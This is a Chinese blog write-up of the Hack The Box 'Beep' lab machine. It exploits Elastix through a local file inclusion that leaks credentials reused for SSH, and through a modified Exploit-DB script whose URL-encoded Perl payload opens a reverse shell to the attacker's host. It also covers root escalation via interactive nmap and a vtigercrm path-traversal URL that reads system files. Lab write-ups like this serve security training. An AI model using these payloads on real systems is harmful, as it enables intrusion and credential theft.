Hack the box - Beep
信息收集
nmap -T4 -A 10.10.10.7
80 端口为 Elastix 应用:
利用 searchsploit 寻找历史漏洞:
漏洞利用
漏洞点一
发现一处 LFI 漏洞,尝试利用,寻找敏感信息:
发现用户名与密码: admin:jEhdIekWmdjE
。
使用该密钥尝试登录,进入后台:
使用该密钥尝试登录 SSH:
发现密钥重用的问题,直接 getshell。
漏洞点二
发现历史漏洞库中一处 RCE 漏洞: https://www.exploit-db.com/exploits/18650
修改 payload,包括 rhost、lhost、lport、extension
import urllib
import ssl
rhost="10.10.10.7"
lhost="10.10.14.7"
lport=4444
extension="233"
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url, context=ctx)
# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
SIP extension 在登录管理后台可以确定
漏洞点三
扫目录时发现 vtigercrm
目录,寻找历史漏洞,存在 LFI:
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
同样可以包含 /etc/amportal.conf
,获取密码信息。
此外,在 MSF 上同样有 vtigercrm
的漏洞:
使用 1 失败,使用 2 成功。
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

上一篇: Docker 逃逸相关总结
下一篇: WAF Bypass 介绍分析
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论